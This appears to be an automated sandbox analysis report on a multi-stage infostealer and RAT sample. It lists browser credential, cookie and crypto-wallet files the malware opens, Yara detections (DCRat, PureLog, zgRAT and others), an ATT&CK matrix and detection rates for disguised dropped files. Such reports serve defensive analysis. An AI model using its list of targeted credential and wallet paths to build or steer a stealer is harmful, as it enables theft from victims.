Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons Maskable	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage.sqlite	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\ls-archive.sqlite	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.log	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Monochrome	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\58ef9818-5ea1-49a0-b5b0-9338401a7943	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\15702f96-fbc1-4934-99bf-a9a7406c1be7	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\webappsstore.sqlite	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\permissions.sqlite	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\protections.sqlite	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Maskable	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file_0.indexeddb.leveldb	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior

Source: Yara match	File source: 14.0.main.exe.25a8b2505b8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.main.exe.25a8b0e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.main.exe.25a8b0eef04.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2799828345.000001F16D0E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.2085852363.0000025A8B0E2000.00000002.00000001.01000000.0000001C.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2070913256.0000000006BB7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: based.exe PID: 7556, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\main.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, type: DROPPED

Remote Access Functionality

Yara detected Amnesia Stealer

Source: Yara match	File source: 00000008.00000003.2077928263.000001F16D066000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.2077472570.000001F16D047000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2799828345.000001F16D0E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: based.exe PID: 7556, type: MEMORYSTR

Yara detected DCRat

Source: Yara match

File source: 00000021.00000002.2411600731.000000001358B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Discord Token Stealer

Source: Yara match	File source: 14.0.main.exe.25a8b2505b8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.main.exe.25a8b0e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.main.exe.25a8b0eef04.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000000.2085852363.0000025A8B0E2000.00000002.00000001.01000000.0000001C.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2070913256.0000000006BB7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\ProgramData\main.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, type: DROPPED

Yara detected Millenuim RAT

Source: Yara match	File source: 14.0.main.exe.25a8b2505b8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.main.exe.25a8b0e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.main.exe.25a8b0eef04.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000000.2085852363.0000025A8B0E2000.00000002.00000001.01000000.0000001C.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2070913256.0000000006BB7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\ProgramData\main.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, type: DROPPED

Yara detected PureLog Stealer

Source: Yara match	File source: 12.3.s.exe.6b53711.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.3.svchost.exe.564e6ea.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.0.ChainComServermonitor.exe.c80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.3.svchost.exe.5e4e6ea.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.3.svchost.exe.5e4e6ea.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.3.svchost.exe.564e6ea.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000003.2086410223.0000000005E00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000000.2123320987.0000000000C82000.00000002.00000001.01000000.00000027.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2070913256.0000000006BB7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000003.2085959626.0000000005600000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\audiodg.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\biuvCXdylsCxguP.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\3D Objects\tasklist.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\Logs\SettingSync\cmd.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\svchost.exe, type: DROPPED

Yara detected Telegram RAT

Source: Yara match	File source: 14.0.main.exe.25a8b2505b8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.main.exe.25a8b0e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.main.exe.25a8b0eef04.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000000.2085852363.0000025A8B0E2000.00000002.00000001.01000000.0000001C.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2070913256.0000000006BB7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: based.exe PID: 7556, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\main.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: 12.3.s.exe.6b53711.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.3.svchost.exe.564e6ea.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.0.ChainComServermonitor.exe.c80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.3.svchost.exe.5e4e6ea.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.3.svchost.exe.5e4e6ea.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.3.svchost.exe.564e6ea.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\audiodg.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\biuvCXdylsCxguP.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\3D Objects\tasklist.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\Logs\SettingSync\cmd.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\svchost.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	111 Scripting	Valid Accounts	441 Windows Management Instrumentation	111 Scripting	1 Abuse Elevation Control Mechanism	51 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	1 Taint Shared Content	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	1 Data Encrypted for Impact
Credentials	Domains	Default Accounts	3 Native API	11 DLL Side-Loading	11 DLL Side-Loading	111 Deobfuscate/Decode Files or Information	1 Credential API Hooking	3 File and Directory Discovery	Remote Desktop Protocol	3 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	113 Command and Scripting Interpreter	1 Windows Service	1 Windows Service	1 Abuse Elevation Control Mechanism	1 Input Capture	58 System Information Discovery	SMB/Windows Admin Shares	1 Screen Capture	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	311 Process Injection	21 Obfuscated Files or Information	NTDS	1 Query Registry	Distributed Component Object Model	1 Credential API Hooking	4 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	1 Service Execution	31 Registry Run Keys / Startup Folder	1 Scheduled Task/Job	221 Software Packing	LSA Secrets	351 Security Software Discovery	SSH	1 Input Capture	5 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	3 PowerShell	RC Scripts	31 Registry Run Keys / Startup Folder	1 Timestomp	Cached Domain Credentials	2 Process Discovery	VNC	1 Clipboard Data	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 DLL Side-Loading	DCSync	251 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 File Deletion	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	4 Rootkit	/etc/passwd and /etc/shadow	1 System Network Configuration Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	233 Masquerading	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	251 Virtualization/Sandbox Evasion	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	311 Process Injection	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking
Determine Physical Locations	Virtual Private Server	Compromise Hardware Supply Chain	Unix Shell	Systemd Timers	Systemd Timers	1 Hidden Files and Directories	GUI Input Capture	Permission Groups Discovery	Replication Through Removable Media	Email Collection	Proxy	Exfiltration over USB	Network Denial of Service

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
iqA8j9yGcd.exe	50%	ReversingLabs	Win64.Trojan.Generic

Dropped Files

Source	Detection	Scanner	Label
C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\audiodg.exe	100%	Avira	HEUR/AGEN.1323342
C:\ProgramData\setup.exe	100%	Avira	TR/CoinMiner.lnxah
C:\Program Files\Google\Chrome\updater.exe	100%	Avira	TR/CoinMiner.lnxah
C:\ProgramData\main.exe	100%	Avira	TR/Spy.KeyLogger.kapbl
C:\Program Files (x86)\Windows Photo Viewer\en-GB\biuvCXdylsCxguP.exe	100%	Avira	HEUR/AGEN.1323342
C:\ProgramData\svchost.exe	100%	Avira	VBS/Runner.VPG
C:\Users\user\3D Objects\tasklist.exe	100%	Avira	HEUR/AGEN.1323342
C:\ProgramData\Microsoft\hacn.exe	100%	Joe Sandbox ML
C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\audiodg.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	100%	Joe Sandbox ML
C:\ProgramData\setup.exe	100%	Joe Sandbox ML
C:\Program Files\Google\Chrome\updater.exe	100%	Joe Sandbox ML
C:\ProgramData\main.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Windows Photo Viewer\en-GB\biuvCXdylsCxguP.exe	100%	Joe Sandbox ML
C:\ProgramData\svchost.exe	100%	Joe Sandbox ML
C:\Users\user\3D Objects\tasklist.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Windows Photo Viewer\en-GB\biuvCXdylsCxguP.exe	74%	ReversingLabs	ByteCode-MSIL.Trojan.Whispergate
C:\Program Files\Google\Chrome\updater.exe	88%	ReversingLabs	Win64.Trojan.SilentCryptoMiner
C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\audiodg.exe	74%	ReversingLabs	ByteCode-MSIL.Trojan.Whispergate
C:\ProgramData\Microsoft\based.exe	58%	ReversingLabs	Win64.Trojan.Leonem
C:\ProgramData\Microsoft\hacn.exe	71%	ReversingLabs	Win64.Trojan.Generic
C:\ProgramData\main.exe	92%	ReversingLabs	ByteCode-MSIL.Trojan.Jalapeno
C:\ProgramData\setup.exe	88%	ReversingLabs	Win64.Trojan.SilentCryptoMiner
C:\ProgramData\svchost.exe	75%	ReversingLabs	Win32.Trojan.Uztuby
C:\Users\user\3D Objects\tasklist.exe	74%	ReversingLabs	ByteCode-MSIL.Trojan.Whispergate
C:\Users\user\AppData\Local\Temp\Costura\A54E036D2DCD19384E8EA53862E0DD8F\64\sqlite.interop.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	47%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\_MEI73082\VCRUNTIME140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI73082\_bz2.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI73082\_decimal.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI73082\_hashlib.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI73082\_lzma.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI73082\_socket.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI73082\libcrypto-3.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI73082\python311.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI73082\select.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI73082\unicodedata.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI75002\VCRUNTIME140.dll	0%	ReversingLabs
